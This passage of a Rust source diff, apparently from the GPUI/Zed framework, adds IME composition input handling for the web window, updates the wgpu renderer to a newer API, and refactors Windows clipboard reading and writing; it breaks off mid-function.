+ let result = this.dispatch_input(PlatformInput::KeyDown(KeyDownEvent {
keystroke,
is_held,
prefer_character_input: false,
}));
+
+ if let Some(result) = result {
+ if !result.propagate {
+ return;
+ }
+ }
+
+ if this.is_composing.get() || event.is_composing() {
+ return;
+ }
+
+ if modifiers.is_subset_of(&Modifiers::shift()) {
+ if let Some(text) = key_char {
+ this.with_input_handler(|handler| {
+ handler.replace_text_in_range(None, &text);
+ });
+ }
+ }
})
}
fn register_key_up(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
let this = Rc::clone(self);
- self.listen("keyup", move |event: JsValue| {
+ self.listen_input("keyup", move |event: JsValue| {
let event: web_sys::KeyboardEvent = event.unchecked_into();
let modifiers = modifiers_from_keyboard_event(&event, this.is_mac);
@@ -396,9 +427,42 @@ impl WebWindowInner {
})
}
+ fn register_composition_start(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
+ let this = Rc::clone(self);
+ self.listen_input("compositionstart", move |_event: JsValue| {
+ this.is_composing.set(true);
+ })
+ }
+
+ fn register_composition_update(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
+ let this = Rc::clone(self);
+ self.listen_input("compositionupdate", move |event: JsValue| {
+ let event: web_sys::CompositionEvent = event.unchecked_into();
+ let data = event.data().unwrap_or_default();
+ this.is_composing.set(true);
+ this.with_input_handler(|handler| {
+ handler.replace_and_mark_text_in_range(None, &data, None);
+ });
+ })
+ }
+
+ fn register_composition_end(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
+ let this = Rc::clone(self);
+ self.listen_input("compositionend", move |event: JsValue| {
+ let event: web_sys::CompositionEvent = event.unchecked_into();
+ let data = event.data().unwrap_or_default();
+ this.is_composing.set(false);
+ this.with_input_handler(|handler| {
+ handler.replace_text_in_range(None, &data);
+ handler.unmark_text();
+ });
+ this.input_element.set_value("");
+ })
+ }
+
fn register_focus(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
let this = Rc::clone(self);
- self.listen("focus", move |_event: JsValue| {
+ self.listen_input("focus", move |_event: JsValue| {
{
let mut state = this.state.borrow_mut();
state.is_active = true;
@@ -412,7 +476,7 @@ impl WebWindowInner {
fn register_blur(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
let this = Rc::clone(self);
- self.listen("blur", move |_event: JsValue| {
+ self.listen_input("blur", move |_event: JsValue| {
{
let mut state = this.state.borrow_mut();
state.is_active = false;
@@ -556,7 +620,10 @@ pub(crate) fn is_mac_platform(browser_window: &web_sys::Window) -> bool {
}
fn is_modifier_only_key(key: &str) -> bool {
- matches!(key, "control" | "alt" | "shift" | "platform" | "capslock")
+ matches!(
+ key,
+ "control" | "alt" | "shift" | "platform" | "capslock" | "compose" | "process"
+ )
}
fn compute_key_char(
@@ -45,6 +45,7 @@ pub(crate) struct WebWindowMutableState {
pub(crate) struct WebWindowInner {
pub(crate) browser_window: web_sys::Window,
pub(crate) canvas: web_sys::HtmlCanvasElement,
+ pub(crate) input_element: web_sys::HtmlInputElement,
pub(crate) has_device_pixel_support: bool,
pub(crate) is_mac: bool,
pub(crate) state: RefCell<WebWindowMutableState>,
@@ -53,6 +54,7 @@ pub(crate) struct WebWindowInner {
pub(crate) pressed_button: Cell<Option<MouseButton>>,
pub(crate) last_physical_size: Cell<(u32, u32)>,
pub(crate) notify_scale: Cell<bool>,
+ pub(crate) is_composing: Cell<bool>,
mql_handle: RefCell<Option<MqlHandle>>,
pending_physical_size: Cell<Option<(u32, u32)>>,
}
@@ -89,7 +91,7 @@ impl WebWindow {
let max_texture_dimension = context.device.limits().max_texture_dimension_2d;
let has_device_pixel_support = check_device_pixel_support();
- canvas.set_tab_index(0);
+ canvas.set_tab_index(-1);
let style = canvas.style();
style
@@ -114,7 +116,21 @@ impl WebWindow {
body.append_child(&canvas)
.map_err(|e| anyhow::anyhow!("Failed to append canvas to body: {e:?}"))?;
- canvas.focus().ok();
+ let input_element: web_sys::HtmlInputElement = document
+ .create_element("input")
+ .map_err(|e| anyhow::anyhow!("Failed to create input element: {e:?}"))?
+ .dyn_into()
+ .map_err(|e| anyhow::anyhow!("Created element is not an input: {e:?}"))?;
+ let input_style = input_element.style();
+ input_style.set_property("position", "fixed").ok();
+ input_style.set_property("top", "0").ok();
+ input_style.set_property("left", "0").ok();
+ input_style.set_property("width", "1px").ok();
+ input_style.set_property("height", "1px").ok();
+ input_style.set_property("opacity", "0").ok();
+ body.append_child(&input_element)
+ .map_err(|e| anyhow::anyhow!("Failed to append input to body: {e:?}"))?;
+ input_element.focus().ok();
let device_size = Size {
width: DevicePixels(0),
@@ -155,6 +171,7 @@ impl WebWindow {
let inner = Rc::new(WebWindowInner {
browser_window,
canvas,
+ input_element,
has_device_pixel_support,
is_mac,
state: RefCell::new(mutable_state),
@@ -163,6 +180,7 @@ impl WebWindow {
pressed_button: Cell::new(None),
last_physical_size: Cell::new((0, 0)),
notify_scale: Cell::new(false),
+ is_composing: Cell::new(false),
mql_handle: RefCell::new(None),
pending_physical_size: Cell::new(None),
});
@@ -389,6 +407,16 @@ impl WebWindowInner {
Some(closure)
}
+ pub(crate) fn with_input_handler<R>(
+ &self,
+ f: impl FnOnce(&mut PlatformInputHandler) -> R,
+ ) -> Option<R> {
+ let mut handler = self.state.borrow_mut().input_handler.take()?;
+ let result = f(&mut handler);
+ self.state.borrow_mut().input_handler = Some(handler);
+ Some(result)
+ }
+
pub(crate) fn register_appearance_change(
self: &Rc<Self>,
) -> Option<Closure<dyn FnMut(JsValue)>> {
@@ -78,11 +78,12 @@ impl WgpuContext {
#[cfg(target_family = "wasm")]
pub async fn new_web() -> anyhow::Result<Self> {
- let instance = wgpu::Instance::new(&wgpu::InstanceDescriptor {
+ let instance = wgpu::Instance::new(wgpu::InstanceDescriptor {
backends: wgpu::Backends::BROWSER_WEBGPU | wgpu::Backends::GL,
flags: wgpu::InstanceFlags::default(),
backend_options: wgpu::BackendOptions::default(),
memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(),
+ display: None,
});
let adapter = instance
@@ -148,12 +149,13 @@ impl WgpuContext {
}
#[cfg(not(target_family = "wasm"))]
- pub fn instance() -> wgpu::Instance {
- wgpu::Instance::new(&wgpu::InstanceDescriptor {
+ pub fn instance(display: Box<dyn wgpu::wgt::WgpuHasDisplayHandle>) -> wgpu::Instance {
+ wgpu::Instance::new(wgpu::InstanceDescriptor {
backends: wgpu::Backends::VULKAN | wgpu::Backends::GL,
flags: wgpu::InstanceFlags::default(),
backend_options: wgpu::BackendOptions::default(),
memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(),
+ display: Some(display),
})
}
@@ -198,9 +200,8 @@ impl WgpuContext {
//
// 1. ZED_DEVICE_ID match — explicit user override
// 2. Compositor GPU match — the GPU the display server is rendering on
- // 3. Device type — WGPU HighPerformance order (Discrete > Integrated >
- // Other > Virtual > Cpu). "Other" ranks above "Virtual" because
- // backends like OpenGL may report real hardware as "Other".
+ // 3. Device type (Discrete > Integrated > Other > Virtual > Cpu).
+ // "Other" ranks above "Virtual" because OpenGL seems to count as "Other".
// 4. Backend — prefer Vulkan/Metal/Dx12 over GL/etc.
adapters.sort_by_key(|adapter| {
let info = adapter.get_info();
@@ -305,10 +306,7 @@ impl WgpuContext {
anyhow::bail!("no compatible alpha modes");
}
- // Create the real device with full features
let (device, queue, dual_source_blending) = Self::create_device(adapter).await?;
-
- // Use an error scope to capture any validation errors during configure
let error_scope = device.push_error_scope(wgpu::ErrorFilter::Validation);
let test_config = wgpu::SurfaceConfiguration {
@@ -324,7 +322,6 @@ impl WgpuContext {
surface.configure(&device, &test_config);
- // Check if there was a validation error
let error = error_scope.pop().await;
if let Some(e) = error {
anyhow::bail!("surface configuration failed: {e}");
@@ -163,21 +163,22 @@ impl WgpuRenderer {
/// The caller must ensure that the window handle remains valid for the lifetime
/// of the returned renderer.
#[cfg(not(target_family = "wasm"))]
- pub fn new<W: HasWindowHandle + HasDisplayHandle>(
+ pub fn new<W>(
gpu_context: GpuContext,
window: &W,
config: WgpuSurfaceConfig,
compositor_gpu: Option<CompositorGpuHint>,
- ) -> anyhow::Result<Self> {
+ ) -> anyhow::Result<Self>
+ where
+ W: HasWindowHandle + HasDisplayHandle + std::fmt::Debug + Send + Sync + Clone + 'static,
+ {
let window_handle = window
.window_handle()
.map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?;
- let display_handle = window
- .display_handle()
- .map_err(|e| anyhow::anyhow!("Failed to get display handle: {e}"))?;
let target = wgpu::SurfaceTargetUnsafe::RawHandle {
- raw_display_handle: display_handle.as_raw(),
+ // Fall back to the display handle already provided via InstanceDescriptor::display.
+ raw_display_handle: None,
raw_window_handle: window_handle.as_raw(),
};
@@ -188,7 +189,7 @@ impl WgpuRenderer {
.borrow()
.as_ref()
.map(|ctx| ctx.instance.clone())
- .unwrap_or_else(WgpuContext::instance);
+ .unwrap_or_else(|| WgpuContext::instance(Box::new(window.clone())));
// Safety: The caller guarantees that the window handle is valid for the
// lifetime of this renderer. In practice, the RawWindow struct is created
@@ -645,7 +646,7 @@ impl WgpuRenderer {
module: &wgpu::ShaderModule| {
let pipeline_layout = device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor {
label: Some(&format!("{name}_layout")),
- bind_group_layouts: &[globals_layout, data_layout],
+ bind_group_layouts: &[Some(globals_layout), Some(data_layout)],
immediate_size: 0,
});
@@ -1052,10 +1053,19 @@ impl WgpuRenderer {
self.atlas.before_frame();
- let texture_result = self.resources().surface.get_current_texture();
- let frame = match texture_result {
- Ok(frame) => frame,
- Err(wgpu::SurfaceError::Lost | wgpu::SurfaceError::Outdated) => {
+ let frame = match self.resources().surface.get_current_texture() {
+ wgpu::CurrentSurfaceTexture::Success(frame) => frame,
+ wgpu::CurrentSurfaceTexture::Suboptimal(frame) => {
+ // Textures must be destroyed before the surface can be reconfigured.
+ drop(frame);
+ let surface_config = self.surface_config.clone();
+ let resources = self.resources_mut();
+ resources
+ .surface
+ .configure(&resources.device, &surface_config);
+ return;
+ }
+ wgpu::CurrentSurfaceTexture::Lost | wgpu::CurrentSurfaceTexture::Outdated => {
let surface_config = self.surface_config.clone();
let resources = self.resources_mut();
resources
@@ -1063,9 +1073,12 @@ impl WgpuRenderer {
.configure(&resources.device, &surface_config);
return;
}
- Err(e) => {
+ wgpu::CurrentSurfaceTexture::Timeout | wgpu::CurrentSurfaceTexture::Occluded => {
+ return;
+ }
+ wgpu::CurrentSurfaceTexture::Validation => {
*self.last_error.lock().unwrap() =
- Some(format!("Failed to acquire surface texture: {e}"));
+ Some("Surface texture validation error".to_string());
return;
}
};
@@ -1609,7 +1622,9 @@ impl WgpuRenderer {
}
pub fn destroy(&mut self) {
- // wgpu resources are automatically cleaned up when dropped
+ // Release surface-bound GPU resources eagerly so the underlying native
+ // window can be destroyed before the renderer itself is dropped.
+ self.resources.take();
}
/// Returns true if the GPU device was lost and recovery is needed.
@@ -1625,11 +1640,10 @@ impl WgpuRenderer {
/// - The first window to call this will recreate the shared context
/// - Subsequent windows will adopt the already-recovered context
#[cfg(not(target_family = "wasm"))]
- pub fn recover(
- &mut self,
- raw_display_handle: raw_window_handle::RawDisplayHandle,
- raw_window_handle: raw_window_handle::RawWindowHandle,
- ) -> anyhow::Result<()> {
+ pub fn recover<W>(&mut self, window: &W) -> anyhow::Result<()>
+ where
+ W: HasWindowHandle + HasDisplayHandle + std::fmt::Debug + Send + Sync + Clone + 'static,
+ {
let gpu_context = self.context.as_ref().expect("recover requires gpu_context");
// Check if another window already recovered the context
@@ -1638,6 +1652,10 @@ impl WgpuRenderer {
.as_ref()
.is_none_or(|ctx| ctx.device_lost());
+ let window_handle = window
+ .window_handle()
+ .map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?;
+
let surface = if needs_new_context {
log::warn!("GPU device lost, recreating context...");
@@ -1648,15 +1666,15 @@ impl WgpuRenderer {
// Wait for GPU driver to stabilize (350ms copied from windows :shrug:)
std::thread::sleep(std::time::Duration::from_millis(350));
- let instance = WgpuContext::instance();
- let surface = create_surface(&instance, raw_display_handle, raw_window_handle)?;
+ let instance = WgpuContext::instance(Box::new(window.clone()));
+ let surface = create_surface(&instance, window_handle.as_raw())?;
let new_context = WgpuContext::new(instance, &surface, self.compositor_gpu)?;
*gpu_context.borrow_mut() = Some(new_context);
surface
} else {
let ctx_ref = gpu_context.borrow();
let instance = &ctx_ref.as_ref().unwrap().instance;
- create_surface(instance, raw_display_handle, raw_window_handle)?
+ create_surface(instance, window_handle.as_raw())?
};
let config = WgpuSurfaceConfig {
@@ -1691,13 +1709,13 @@ impl WgpuRenderer {
#[cfg(not(target_family = "wasm"))]
fn create_surface(
instance: &wgpu::Instance,
- raw_display_handle: raw_window_handle::RawDisplayHandle,
raw_window_handle: raw_window_handle::RawWindowHandle,
) -> anyhow::Result<wgpu::Surface<'static>> {
unsafe {
instance
.create_surface_unsafe(wgpu::SurfaceTargetUnsafe::RawHandle {
- raw_display_handle,
+ // Fall back to the display handle already provided via InstanceDescriptor::display.
+ raw_display_handle: None,
raw_window_handle,
})
.map_err(|e| anyhow::anyhow!("{e}"))
@@ -8,24 +8,22 @@ use windows::Win32::{
System::{
DataExchange::{
CloseClipboard, CountClipboardFormats, EmptyClipboard, EnumClipboardFormats,
- GetClipboardData, GetClipboardFormatNameW, IsClipboardFormatAvailable, OpenClipboard,
- RegisterClipboardFormatW, SetClipboardData,
+ GetClipboardData, GetClipboardFormatNameW, OpenClipboard, RegisterClipboardFormatW,
+ SetClipboardData,
},
Memory::{GMEM_MOVEABLE, GlobalAlloc, GlobalLock, GlobalSize, GlobalUnlock},
Ole::{CF_DIB, CF_HDROP, CF_UNICODETEXT},
},
UI::Shell::{DragQueryFileW, HDROP},
};
-use windows_core::PCWSTR;
+use windows::core::{Owned, PCWSTR};
use gpui::{
ClipboardEntry, ClipboardItem, ClipboardString, ExternalPaths, Image, ImageFormat, hash,
};
-// https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-dragqueryfilew
const DRAGDROP_GET_FILES_COUNT: u32 = 0xFFFFFFFF;
-// Clipboard formats
static CLIPBOARD_HASH_FORMAT: LazyLock<u32> =
LazyLock::new(|| register_clipboard_format(windows::core::w!("GPUI internal text hash")));
static CLIPBOARD_METADATA_FORMAT: LazyLock<u32> =
@@ -39,47 +37,94 @@ static CLIPBOARD_PNG_FORMAT: LazyLock<u32> =
static CLIPBOARD_JPG_FORMAT: LazyLock<u32> =
LazyLock::new(|| register_clipboard_format(windows::core::w!("JFIF")));
-// Helper maps and sets
-static FORMATS_MAP: LazyLock<FxHashMap<u32, ClipboardFormatType>> = LazyLock::new(|| {
- let mut formats_map = FxHashMap::default();
- formats_map.insert(CF_UNICODETEXT.0 as u32, ClipboardFormatType::Text);
- formats_map.insert(*CLIPBOARD_PNG_FORMAT, ClipboardFormatType::Image);
- formats_map.insert(*CLIPBOARD_GIF_FORMAT, ClipboardFormatType::Image);
- formats_map.insert(*CLIPBOARD_JPG_FORMAT, ClipboardFormatType::Image);
- formats_map.insert(*CLIPBOARD_SVG_FORMAT, ClipboardFormatType::Image);
- formats_map.insert(CF_DIB.0 as u32, ClipboardFormatType::Image);
- formats_map.insert(CF_HDROP.0 as u32, ClipboardFormatType::Files);
- formats_map
-});
static IMAGE_FORMATS_MAP: LazyLock<FxHashMap<u32, ImageFormat>> = LazyLock::new(|| {
- let mut formats_map = FxHashMap::default();
- formats_map.insert(*CLIPBOARD_PNG_FORMAT, ImageFormat::Png);
- formats_map.insert(*CLIPBOARD_GIF_FORMAT, ImageFormat::Gif);
- formats_map.insert(*CLIPBOARD_JPG_FORMAT, ImageFormat::Jpeg);
- formats_map.insert(*CLIPBOARD_SVG_FORMAT, ImageFormat::Svg);
- formats_map
+ let mut map = FxHashMap::default();
+ map.insert(*CLIPBOARD_PNG_FORMAT, ImageFormat::Png);
+ map.insert(*CLIPBOARD_GIF_FORMAT, ImageFormat::Gif);
+ map.insert(*CLIPBOARD_JPG_FORMAT, ImageFormat::Jpeg);
+ map.insert(*CLIPBOARD_SVG_FORMAT, ImageFormat::Svg);
+ map
});
-#[derive(Debug, Clone, Copy)]
-enum ClipboardFormatType {
- Text,
- Image,
- Files,
+fn register_clipboard_format(format: PCWSTR) -> u32 {
+ let ret = unsafe { RegisterClipboardFormatW(format) };
+ if ret == 0 {
+ panic!(
+ "Error when registering clipboard format: {}",
+ std::io::Error::last_os_error()
+ );
+ }
+ log::debug!(
+ "Registered clipboard format {} as {}",
+ unsafe { format.display() },
+ ret
+ );
+ ret
+}
+
+fn get_clipboard_data(format: u32) -> Option<LockedGlobal> {
+ let global = HGLOBAL(unsafe { GetClipboardData(format).ok() }?.0);
+ LockedGlobal::lock(global)
}
pub(crate) fn write_to_clipboard(item: ClipboardItem) {
- with_clipboard(|| write_to_clipboard_inner(item));
+ let Some(_clip) = ClipboardGuard::open() else {
+ return;
+ };
+
+ let result: Result<()> = (|| {
+ unsafe { EmptyClipboard()? };
+ for entry in item.entries() {
+ match entry {
+ ClipboardEntry::String(string) => write_string(string)?,
+ ClipboardEntry::Image(image) => write_image(image)?,
+ ClipboardEntry::ExternalPaths(_) => {}
+ }
+ }
+ Ok(())
+ })();
+
+ if let Err(e) = result {
+ log::error!("Failed to write to clipboard: {e}");
+ }
}
pub(crate) fn read_from_clipboard() -> Option<ClipboardItem> {
- with_clipboard(|| {
- with_best_match_format(|item_format| match format_to_type(item_format) {
- ClipboardFormatType::Text => read_string_from_clipboard(),
- ClipboardFormatType::Image => read_image_from_clipboard(item_format),
- ClipboardFormatType::Files => read_files_from_clipboard(),
- })
- })
- .flatten()
+ let _clip = ClipboardGuard::open()?;
+
+ let mut entries = Vec::new();
+ let mut have_text = false;
+ let mut have_image = false;
+ let mut have_files = false;
+
+ let count = unsafe { CountClipboardFormats() };
+ let mut format = 0;
+ for _ in 0..count {
+ format = unsafe { EnumClipboardFormats(format) };
+
+ if !have_text && format == CF_UNICODETEXT.0 as u32 {
+ if let Some(entry) = read_string() {
+ entries.push(entry);
+ have_text = true;
+ }
+ } else if !have_image && is_image_format(format) {
+ if let Some(entry) = read_image(format) {
+ entries.push(entry);
+ have_image = true;
+ }
+ } else if !have_files && format == CF_HDROP.0 as u32 {
+ if let Some(entry) = read_files() {
+ entries.push(entry);
+ have_files = true;
+ }
+ }
+ }
+
+ if entries.is_empty() {
+ log_unsupported_clipboard_formats();
+ return None;
+ }
+ Some(ClipboardItem { entries })
}
pub(crate) fn with_file_names<F>(hdrop: HDROP, mut f: F)
@@ -97,359 +142,247 @@ where
}
match String::from_utf16(&buffer[0..filename_length]) {
Ok(file_name) => f(file_name),
- Err(e) => {
- log::error!("dragged file name is not UTF-16: {}", e)
- }
+ Err(e) => log::error!("dragged file name is not UTF-16: {}", e),
}
}
}
-fn with_clipboard<F, T>(f: F) -> Option<T>
-where
- F: FnOnce() -> T,
-{
- match unsafe { OpenClipboard(None) } {
- Ok(()) => {
- let result = f();
- if let Err(e) = unsafe { CloseClipboard() } {
- log::error!("Failed to close clipboard: {e}",);
- }
- Some(result)
- }
- Err(e) => {
- log::error!("Failed to open clipboard: {e}",);
- None
- }
+fn set_clipboard_bytes<T>(data: &[T], format: u32) -> Result<()> {
+ unsafe {
+ let global = Owned::new(GlobalAlloc(GMEM_MOVEABLE, std::mem::size_of_val(data))?);
+ let ptr = GlobalLock(*global);
+ anyhow::ensure!(!ptr.is_null(), "GlobalLock returned null");
+ std::ptr::copy_nonoverlapping(data.as_ptr(), ptr as _, data.len());
+ GlobalUnlock(*global).ok();
+ SetClipboardData(format, Some(HANDLE(global.0)))?;
+ // SetClipboardData succeeded — the system now owns the memory.
+ std::mem::forget(global);
}
+ Ok(())
}
-fn register_clipboard_format(format: PCWSTR) -> u32 {
- let ret = unsafe { RegisterClipboardFormatW(format) };
- if ret == 0 {
- panic!(
- "Error when registering clipboard format: {}",
- std::io::Error::last_os_error()
- );
+fn get_clipboard_string(format: u32) -> Option<String> {
+ let locked = get_clipboard_data(format)?;
+ let bytes = locked.as_bytes();
+ let words_len = bytes.len() / std::mem::size_of::<u16>();
+ if words_len == 0 {
+ return Some(String::new());
}
- log::debug!(
- "Registered clipboard format {} as {}",
- unsafe { format.display() },
- ret
- );
- ret
+ let slice = unsafe { std::slice::from_raw_parts(bytes.as_ptr() as *const u16, words_len) };
+ let actual_len = slice.iter().position(|&c| c == 0).unwrap_or(words_len);
+ Some(String::from_utf16_lossy(&slice[..actual_len]))
}
-#[inline]
-fn format_to_type(item_format: u32) -> &'static ClipboardFormatType {
- FORMATS_MAP.get(&item_format).unwrap()
-}
-
-// Currently, we only write the first item.
-fn write_to_clipboard_inner(item: ClipboardItem) -> Result<()> {
- unsafe {
- EmptyClipboard()?;
- }
- match item.entries().first() {
- Some(entry) => match entry {
- ClipboardEntry::String(string) => {
- write_string_to_clipboard(string)?;
- }
- ClipboardEntry::Image(image) => {
- write_image_to_clipboard(image)?;
- }
- ClipboardEntry::ExternalPaths(_) => {}
- },
- None => {
- // Writing an empty list of entries just clears the clipboard.
- }
- }
- Ok(())
+fn is_image_format(format: u32) -> bool {
+ IMAGE_FORMATS_MAP.contains_key(&format) || format == CF_DIB.0 as u32
}
-fn write_string_to_clipboard(item: &ClipboardString) -> Result<()> {
- let encode_wide = item.text.encode_utf16().chain(Some(0)).collect_vec();
- set_data_to_clipboard(&encode_wide, CF_UNICODETEXT.0 as u32)?;
+fn write_string(item: &ClipboardString) -> Result<()> {
+ let wide: Vec<u16> = item.text.encode_utf16().chain(Some(0)).collect_vec();
+ set_clipboard_bytes(&wide, CF_UNICODETEXT.0 as u32)?;
if let Some(metadata) = item.metadata.as_ref() {
- let hash_result = {
- let hash = ClipboardString::text_hash(&item.text);
- hash.to_ne_bytes()
- };
- let encode_wide =
- unsafe { std::slice::from_raw_parts(hash_result.as_ptr().cast::<u16>(), 4) };
- set_data_to_clipboard(encode_wide, *CLIPBOARD_HASH_FORMAT)?;
-
- let metadata_wide = metadata.encode_utf16().chain(Some(0)).collect_vec();
- set_data_to_clipboard(&metadata_wide, *CLIPBOARD_METADATA_FORMAT)?;
+ let hash_bytes = ClipboardString::text_hash(&item.text).to_ne_bytes();
+ set_clipboard_bytes(&hash_bytes, *CLIPBOARD_HASH_FORMAT)?;
+
+ let wide: Vec<u16> = metadata.encode_utf16().chain(Some(0)).collect_vec();
+ set_clipboard_bytes(&wide, *CLIPBOARD_METADATA_FORMAT)?;
}
Ok(())
}
-fn set_data_to_clipboard<T>(data: &[T], format: u32) -> Result<()> {
- unsafe {
- let global = GlobalAlloc(GMEM_MOVEABLE, std::mem::size_of_val(data))?;
- let handle = GlobalLock(global);
- std::ptr::copy_nonoverlapping(data.as_ptr(), handle as _, data.len());
- let _ = GlobalUnlock(global);
- SetClipboardData(format, Some(HANDLE(global.0)))?;
+fn write_image(item: &Image) -> Result<()> {
+ let native_format = match item.format {
+ ImageFormat::Svg => Some(*CLIPBOARD_SVG_FORMAT),
+ ImageFormat::Gif => Some(*CLIPBOARD_GIF_FORMAT),
+ ImageFormat::Png => Some(*CLIPBOARD_PNG_FORMAT),
+ ImageFormat::Jpeg => Some(*CLIPBOARD_JPG_FORMAT),
+ _ => None,
+ };
+ if let Some(format) = native_format {
+ set_clipboard_bytes(item.bytes(), format)?;
}
- Ok(())
-}
-// Here writing PNG to the clipboard to better support other apps. For more info, please ref to
-// the PR.
-fn write_image_to_clipboard(item: &Image) -> Result<()> {
- match item.format {
- ImageFormat::Svg => set_data_to_clipboard(item.bytes(), *CLIPBOARD_SVG_FORMAT)?,
- ImageFormat::Gif => {
- set_data_to_clipboard(item.bytes(), *CLIPBOARD_GIF_FORMAT)?;
- let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Gif)?;
- set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
- }
- ImageFormat::Png => {
- set_data_to_clipboard(item.bytes(), *CLIPBOARD_PNG_FORMAT)?;
- let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Png)?;
- set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
- }
- ImageFormat::Jpeg => {
- set_data_to_clipboard(item.bytes(), *CLIPBOARD_JPG_FORMAT)?;
- let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Jpeg)?;
- set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
- }
- other => {
- log::warn!(
- "Clipboard unsupported image format: {:?}, convert to PNG instead.",
- item.format
- );
- let png_bytes = convert_image_to_png_format(item.bytes(), other)?;
- set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
+ // Also provide a PNG copy for broad compatibility.
+ // SVG can't be rasterized by the image crate, so skip it.
+ if item.format != ImageFormat::Svg && native_format != Some(*CLIPBOARD_PNG_FORMAT) {
+ if let Some(png_bytes) = convert_to_png(item.bytes(), item.format) {
+ set_clipboard_bytes(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
}
}
Ok(())
}
-fn convert_image_to_png_format(bytes: &[u8], image_format: ImageFormat) -> Result<Vec<u8>> {
- let image =
- image::load_from_memory_with_format(bytes, gpui_image_format_to_image(image_format))?;
- let mut output_buf = Vec::new();
- image.write_to(
- &mut std::io::Cursor::new(&mut output_buf),
- image::ImageFormat::Png,
- )?;
- Ok(output_buf)
-}
-
-// Here, we enumerate all formats on the clipboard and find the first one that we can process.
-// The reason we don't use `GetPriorityClipboardFormat` is that it sometimes returns the
-// wrong format.
-// For instance, when copying a JPEG image from Microsoft Word, there may be several formats
-// on the clipboard: Jpeg, Png, Svg.
-// If we use `GetPriorityClipboardFormat`, it will return Svg, which is not what we want.
-fn with_best_match_format<F>(f: F) -> Option<ClipboardItem>
-where
- F: Fn(u32) -> Option<ClipboardEntry>,
-{
- let mut text = None;
- let mut image = None;
- let mut files = None;
- let count = unsafe { CountClipboardFormats() };
- let mut clipboard_format = 0;
- for _ in 0..count {
- clipboard_format = unsafe { EnumClipboardFormats(clipboard_format) };
- let Some(item_format) = FORMATS_MAP.get(&clipboard_format) else {
- continue;
- };
- let bucket = match item_format {
- ClipboardFormatType::Text if text.is_none() => &mut text,
- ClipboardFormatType::Image if image.is_none() => &mut image,
- ClipboardFormatType::Files if files.is_none() => &mut files,
- _ => continue,
- };
- if let Some(entry) = f(clipboard_format) {
- *bucket = Some(entry);
- }
- }
-
- if let Some(entry) = [image, files, text].into_iter().flatten().next() {
- return Some(ClipboardItem {
- entries: vec![entry],
- });
- }
-
- // log the formats that we don't support yet.
- {
- clipboard_format = 0;
- for _ in 0..count {
- clipboard_format = unsafe { EnumClipboardFormats(clipboard_format) };
- let mut buffer = [0u16; 64];
- unsafe { GetClipboardFormatNameW(clipboard_format, &mut buffer) };
- let format_name = String::from_utf16_lossy(&buffer);
- log::warn!(
- "Try to paste with unsupported clipboard format: {}, {}.",
- clipboard_format,
- format_name
- );
- }
- }
- None
+fn convert_to_png(bytes: &[u8], format: ImageFormat) -> Option<Vec<u8>> {
+ let img_format = gpui_to_image_format(format)?;
+ let image = image::load_from_memory_with_format(bytes, img_format)
+ .map_err(|e| log::warn!("Failed to decode image for PNG conversion: {e}"))
+ .ok()?;
+ let mut buf = Vec::new();
+ image
+ .write_to(&mut std::io::Cursor::new(&mut buf), image::ImageFormat::Png)
+ .map_err(|e| log::warn!("Failed to encode PNG: {e}"))
+ .ok()?;
+ Some(buf)
}
-fn read_string_from_clipboard() -> Option<ClipboardEntry> {
- let text = with_clipboard_data(CF_UNICODETEXT.0 as u32, |data_ptr, _| {
- let pcwstr = PCWSTR(data_ptr as *const u16);
- String::from_utf16_lossy(unsafe { pcwstr.as_wide() })
- })?;
- let Some(hash) = read_hash_from_clipboard() else {
- return Some(ClipboardEntry::String(ClipboardString::new(text)));
- };
- let Some(metadata) = read_metadata_from_clipboard() else {
- return Some(ClipboardEntry::String(ClipboardString::new(text)));
- };
- if hash == ClipboardString::text_hash(&text) {
- Some(ClipboardEntry::String(ClipboardString {
- text,
- metadata: Some(metadata),
- }))
- } else {
- Some(ClipboardEntry::String(ClipboardString::new(text)))
- }
+fn read_string() -> Option<ClipboardEntry> {
+ let text = get_clipboard_string(CF_UNICODETEXT.0 as u32)?;
+ let metadata = read_clipboard_metadata(&text);
+ Some(ClipboardEntry::String(ClipboardString { text, metadata }))
}
-fn read_hash_from_clipboard() -> Option<u64> {
- if unsafe { IsClipboardFormatAvailable(*CLIPBOARD_HASH_FORMAT).is_err() } {
+fn read_clipboard_metadata(text: &str) -> Option<String> {
+ let locked = get_clipboard_data(*CLIPBOARD_HASH_FORMAT)?;
+ let hash_bytes: [u8; 8] = locked.as_bytes().get(..8)?.try_into().ok()?;
+ let hash = u64::from_ne_bytes(hash_bytes);
+ if hash != ClipboardString::text_hash(text) {
return None;
}
- with_clipboard_data(*CLIPBOARD_HASH_FORMAT, |data_ptr, size| {
- if size < 8 {
- return None;
- }
- let hash_bytes: [u8; 8] = unsafe {
- std::slice::from_raw_parts(data_ptr.cast::<u8>(), 8)
- .try_into()
- .ok()
- }?;
- Some(u64::from_ne_bytes(hash_bytes))
- })?
+ get_clipboard_string(*CLIPBOARD_METADATA_FORMAT)
}
-fn read_metadata_from_clipboard() -> Option<String> {
- unsafe { IsClipboardFormatAvailable(*CLIPBOARD_METADATA_FORMAT).ok()? };
- with_clipboard_data(*CLIPBOARD_METADATA_FORMAT, |data_ptr, _size| {
- let pcwstr = PCWSTR(data_ptr as *const u16);
- String::from_utf16_lossy(unsafe { pcwstr.as_wide() })
- })
+fn read_image(format: u32) -> Option<ClipboardEntry> {
+ let locked = get_clipboard_data(format)?;
